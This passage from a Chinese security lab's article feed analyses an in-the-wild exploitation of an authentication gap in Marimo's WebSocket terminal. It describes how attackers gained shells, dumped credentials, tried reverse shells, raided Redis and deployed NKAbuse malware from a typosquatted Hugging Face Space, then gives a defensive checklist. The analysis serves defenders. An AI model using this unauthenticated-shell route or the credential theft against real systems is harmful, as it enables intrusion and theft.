class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494935&amp;idx=1&amp;sn=2087d14d42eb91ff972139ef7fefc5d5&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.4.4-2026.4.10）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.4.4-2026.4.10）</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494916&amp;idx=1&amp;sn=b01106658b570c0d850fb0a21ccbb036&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.3.28-2026.4.3）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.3.28-2026.4.3）</a></span></p></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=998447f3&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247495007%26idx%3D1%26sn%3D498f79f86d05ce3ce50d17af257ded42">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 01 May 2026 18:01:00 +0800</pubDate>
    </item>
    <item>
      <title>AI安全案例分析 | Marimo 零日漏洞与Hugging Face平台滥用（文末附邀请码）</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494999&amp;idx=1&amp;sn=8a33dea317d873ca1912b36c3fab507f</link>
      <description>这也是这次攻击事件的关键背景——攻击者并非随机选择目标，而是精准瞄准了 AI/ML 开发者的工具链。</description>
      <content:encoded><![CDATA[<p>原创 <span>天元实验室</span> <span>2026-04-23 18:00</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=85c19802&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FuZT6kWW1jClX9b5oZVse88oRMmJ4j3WvF4h9OXOe3KLjwkpDiac4Ar7cd6WZuqp6rXZwEArYmLMpFjK0nGlhOqpiaicFicsO7hoyZkhRIwXTTAk%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>这也是这次攻击事件的关键背景——攻击者并非随机选择目标，而是精准瞄准了 AI/ML 开发者的工具链。</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">01 </span></span><span leaf="">事件背景：谁在使用 Marimo？</span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Jupyter Notebook 主导数据科学生态多年之后，Marimo 作为一个现代化的响应式 Python notebook 框架悄然崛起，其响应式执行模型、内置 Web UI 能力和更简洁的依赖管理受到了 AI/ML 开发者群体的青睐。这也是这次攻击事件的关键背景——攻击者并非随机选择目标，而是精准瞄准了 AI/ML 开发者的工具链。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">与通用服务器不同，数据科学开发者的工作站是一座“凭证金矿”：云厂商 Access Key（AWS、GCP、Azure）、数据库连接字符串、OpenAI / Anthropic API Token、SSH 私钥，以及直接通往内网数据管道的网络权限。一台被植入后门的 AI 开发者工作站，其价值远超普通业务服务器。</span></p></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">02 漏洞解剖</span></span></strong></p></div></div></div></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-39987 的成因异常简单，简单到令人警觉。Marimo 提供了一个基于 WebSocket 的终端功能（路径 /terminal/ws），用于在 notebook 界面内嵌入交互式 Shell。问题在于该端点完全跳过了认证验证，而其他端点（如 /ws）均正确调用了 validate_auth()。</span></p><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100011338" data-ratio="0.3477832512315271" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="jpeg" data-w="1015" src="https://wechat2rss.xlab.app/img-proxy/?k=ba682142&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCkNbibyHFX1HdzLGqI3oYWC7Kiav1ID4IWWHfrcZweTLsdn8nw11GgOQPKyenQicK0J5zQqwrgz18b2IrqUnJEf4DficSeSSsnyteM%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">任何能访问 Marimo 服务端口的未认证攻击者，只需建立一个 WebSocket 连接，即可获得完整的 PTY Shell——等同于直接拿到 SSH 登录权限，且无需任何凭证。</span></p><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(170, 169, 169);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">安全设计教训</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">中间件（Middleware）级别的鉴权无法替代端点级别的显式验证。每个高风险端点都必须独立调用认证逻辑，不能依赖【其他地方应该已经处理了】的假设。WebSocket 端点尤其容易因此类遗漏而产生绕过。</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">03 攻击时间线</span></span></strong></p></div></div></div></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.45925925925925926" data-s="300,640" data-type="jpeg" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011340" src="https://wechat2rss.xlab.app/img-proxy/?k=d7e4c7fe&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCmeMKyJLBJlIsaN2BPWSrwnpwbpOFJbRGVjo6EQicZAOqy6Fg13Zdia3MXp8JFNtzbWRA2EicRw3GPT5eZzz5ibMRfAFAgAmcr4uFA%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">04 攻击链全景与四种后利用模式</span></span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Sysdig 研究团队在监控期间识别出四种独立的后利用模式，体现了不同技术水平和目的的攻击者并发在野利用：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(67, 146, 117);box-sizing: border-box;"><span leaf="">模式一：凭证收割者（高价值目标）</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">最具破坏性的操作来自德国 IP 攻击者（195 次事件，持续超过 3 小时）。该攻击者系统性地转储环境变量，成功提取 AWS Access Key、数据库连接字符串，甚至 OpenAI API Token。单一 Marimo 实例的沦陷直接打通了受害者整个云基础设施入口。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(67, 146, 117);box-sizing: border-box;"><span leaf="">模式二：反弹 Shell 系列测试</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">同一德国 IP 尝试了 15 种不同的反弹 Shell 技术（涵盖多种协议与端口），随后利用从环境变量中泄露的 DATABASE_URL 直接连接 PostgreSQL 实例，枚举 schema、数据表与配置信息。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(67, 146, 117);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">模式三：Redis 数据库清洗</span></strong></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">香港 IP 攻击者利用从 Marimo 的 .env 文件中盗取的凭证针对 Redis 服务器展开攻击，系统性地遍历全部 16 个逻辑数据库，转储了包含 Session Token 和应用缓存在内的大量数据。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(67, 146, 117);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">模式四：NKAbuse 恶意软件部署（最高威胁）</span></strong></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">来自 IP 38.147.173[.]172 的攻击者通过 curl 执行 Hugging Face Space 上的 Shell 脚本，部署了本次事件的核心恶意载荷：</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.22777777777777777" data-s="300,640" data-type="jpeg" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011342" src="https://wechat2rss.xlab.app/img-proxy/?k=85d8f9d2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FuZT6kWW1jCnE00MJozND5rkNiaELLgiakze4DXicI4OxqAicUAeJ84HGKJKRzw9RYbxibVP0wskOST57VrQU2mF6KK8iazM6eYAiae8YDNswFGsj7g%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">05 NKAbuse 2026 变种</span></span></strong></p></div></div></div></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">NKAbuse 最初由卡巴斯基于 2023 年 12 月记录，是一种利用 NKN（New Kind of Network）协议实现 C2 通信的 Go 语言后门。NKN 是基于区块链的去中心化网络协议，节点分散在全球，无单一 IP 或域名可屏蔽，C2 流量混入正常区块链活动，对传统检测体系近乎隐形。</span></p><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4462962962962963" data-s="300,640" data-type="jpeg" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011341" src="https://wechat2rss.xlab.app/img-proxy/?k=5b7f84dd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FuZT6kWW1jCkXic8H63nLB1ibAn4wY0JeibndTGJMdPtOeMibny93Qmzngz1neX6ferYe4iaDGVMt18UtPaXtS7jNcSGugUvdxsughXwtWsyfiaRwU%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(170, 169, 169);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">🔗 </span><span style="color: rgb(160, 160, 160);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">NKN 协议为何难以检测</span></strong></span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">NKN 使用去中心化中继节点网络进行通信，无固定 IP 或域名，其流量特征与正常区块链活动高度相似。传统防火墙规则、IP 黑名单和域名阻断对其近乎失效。攻击者选择 NKN 作为 C2 基础设施的核心原因正是其抗审查、高弹性的设计特性。</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">06 平台滥用的新范式</span></span></strong></p></div></div></div></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这次攻击中最值得关注的战术创新，不是漏洞本身，而是将受信任的 AI 平台转化为恶意软件分发节点。攻击者创建的 Space 命名为 vsccode-modetx——针对【vscode】的拼写仿冒。在 Sysdig 分析时，该恶意 Space 在 16 个声誉评分来源中均获得 0 分（无威胁标记）。</span></p><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.3962962962962963" data-s="300,640" data-type="jpeg" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011339" src="https://wechat2rss.xlab.app/img-proxy/?k=e7a4012e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jClzzZROPgYySG2OGQd6PnMmfShgMn2nU3J1oOiaa6cEQckZTqpW34qVicCqD5kJ82DuTheXdUZibM8gcnkbksbNfvLlhDvicElGhOA%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">07 攻击者为何专门针对 AI/ML 开发者？</span></span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AI/ML 开发者的工作站是凭证密度最高的终端之一：他们通常同时持有多个云账号的高权限 IAM Key（用于调用推理 API、存储模型权重）、连接生产数据库的 URL（用于训练数据读取）、GitHub/GitLab Token（可访问代码仓库和 CI/CD 管道），以及 OpenAI、Anthropic 等 AI 服务的付费 API Token（可被直接变现或用于后续攻击）。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">更关键的是，Marimo 等 notebook 工具天然地被设计成【便于快速实验】，这意味着开发者往往会在环境变量中直接写入凭证，而非通过 Vault 或 Secret Manager 等安全方式管理——这在生产部署中是高危反模式，但在数据科学工作流中却异常普遍。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(170, 169, 169);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">🔴 </span><strong style="box-sizing: border-box;"><span leaf="">高风险场景识别</span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">如果你的 Marimo 实例运行在以下任意场景，且版本低于 0.23.0，请视为已被入侵处理：</span></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">公网可访问的服务器</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">云端 Notebook 服务（如 JupyterHub 部署）</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">企业内网开发环境（无额外访问控制）</span></p></li></ul><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">立即执行应急响应，不要等待变更审批窗口。</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">08 防御侧行动清单</span></span></strong></p></div></div></div></div><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">升级 Marimo 至 0.23.0+ — 立即升级</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">威胁猎杀 — 在所有曾运行 Marimo 的主机上搜索 ~/.kagent/ 目录、kagent.service systemd 服务项、正在运行的 kagent 进程。发现任何一项，立即隔离主机。</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">DNS / 代理层封锁 — 在 DNS 和代理层面屏蔽 vsccode-modetx.hf.space，阻断已知载荷投递 URL。</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">凭证轮换 — 对所有暴露过 Marimo 实例的环境，强制轮换 DATABASE_URL、AWS/GCP Key、OpenAI/Anthropic API Token 等高价值凭证。</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网络访问控制 — Marimo 及类似 notebook 服务严禁直接暴露至公网，强制通过 VPN、堡垒机或带认证的反向代理访问，监听地址从 0.0.0.0 收紧至 127.0.0.1。</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AI 平台依赖审计 — 建立对 Hugging Face Spaces 等 AI 资产平台的访问白名单策略，限制生产环境从非验证来源拉取脚本或二进制文件。</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">运行时行为检测 — 部署基于行为的运行时检测（如 Falco、Sysdig Agent），针对 notebook 进程产生的非预期子进程、外联连接、文件创建行为设置告警规则。签名检测对此类新变种无效。</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AISS安全智链社区已收录本案例，感兴趣的读者可前往 </span><span style="color: rgb(67, 146, 117);box-sizing: border-box;"><span leaf=""><a href="https://aiss.nsfocus.com/#/ai-cases" target="_blank">https://aiss.nsfocus.com/#/ai-cases</a></span></span><span leaf=""> 查看更多 AI 安全相关案例分析与最新研究。</span></p><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">09 结语：AI 基础设施安全债</span></span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这次攻击事件揭示的不只是一个 WebSocket 的鉴权遗漏，而是 AI/ML 工具链在快速发展过程中积累的安全债务。Jupyter、Marimo、Streamlit、Gradio 这类以【易用】为核心卖点的开发工具，往往在设计之初更优先考虑开发者体验，而安全边界的设置则相对粗放。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">当这类工具从本地开发环境走向云端协作平台，当 Hugging Face 从模型分享社区成长为 AI 生态的核心基础设施，当数据科学家的工作站成为持有云端高权限凭证的关键节点——传统的安全假设已经失效，新的威胁模型需要重新构建。威胁行为者已经完成了对 AI/ML 工具链的定向研究和武器化。防御侧的同步跟进，是现在最紧迫的议题。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">原文报告链接：</span><span style="color: rgb(67, 146, 117);box-sizing: border-box;"><span leaf=""><a href="https://www.bleepingcomputer.com/news/security/hackers-exploit-marimo-flaw-to-deploy-nkabuse-malware-from-hugging-face/" target="_blank">https://www.bleepingcomputer.com/news/security/hackers-exploit-marimo-flaw-to-deploy-nkabuse-malware-from-hugging-face/</a></span></span></p></div><div style="margin: 54px 0% 10px;text-align: center;justify-content: center;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 95%;vertical-align: top;border-style: solid;border-width: 2px;border-color: rgb(67, 146, 117);padding: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 11px;margin: -44px 0% 0px;box-sizing: border-box;"><div style="width: 7em;height: 7em;display: inline-block;vertical-align: middle;border-radius: 100%;background-color: rgb(255, 255, 255);margin: 0px -2.18em 0px -2.2em;box-sizing: border-box;"><div data-cacheurl="" data-remoteid="" style="width: 6em;height: 6em;margin: 0.5em auto;border-radius: 100%;background-position: 50.9993% 50%;background-repeat: no-repeat;background-size: 170.274%;border-width: 3px;border-style: solid;border-color: rgb(255, 255, 255);overflow: hidden;box-sizing: border-box;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=9a6f93f7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCn7VPuic6bFvy6J15X1jV4d1FzOnv9M9DEia9mDpl2EYYjKwU6ueB4PPw7CousXoJFbnvfGFKaWf2FiaibQUcwgI757mUnGvmrV9OY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><p style="width: 100%;height: 100%;overflow: hidden;line-height: 0;max-width: 100%;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9722222" data-s="300,640" data-type="png" data-w="1080" style="width: 100%;height: 100%;opacity: 0;box-sizing: border-box;" data-imgfileid="100011344" src="https://wechat2rss.xlab.app/img-proxy/?k=1c6c5c5c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCliceVefgicMomAiaQBdFmkrGJUicIGq5offS0nuNYV0NF75XM7TEDjB5tbMhgiceIVj6lIticjBUwlHrr9icBdibtqoIaBR1jsI6KjMLA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div><div style="justify-content: center;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 10px 10px 20px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.8;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">绿盟科技天元实验室</span></strong><span leaf="">专注于新型实战化攻防对抗技术研究。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">研究目标包括：漏洞利用技术、防御绕过技术、攻击隐匿技术、攻击持久化技术等蓝军技术，以及攻击技战术、攻击框架的研究。涵盖Web安全、终端安全、AD安全、云安全等多个技术领域的攻击技术研究，以及工业互联网、车联网等业务场景的攻击技术研究。通过研究攻击对抗技术，从攻击视角提供识别风险的方法和手段，为威胁对抗提供决策支撑。</span></p></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 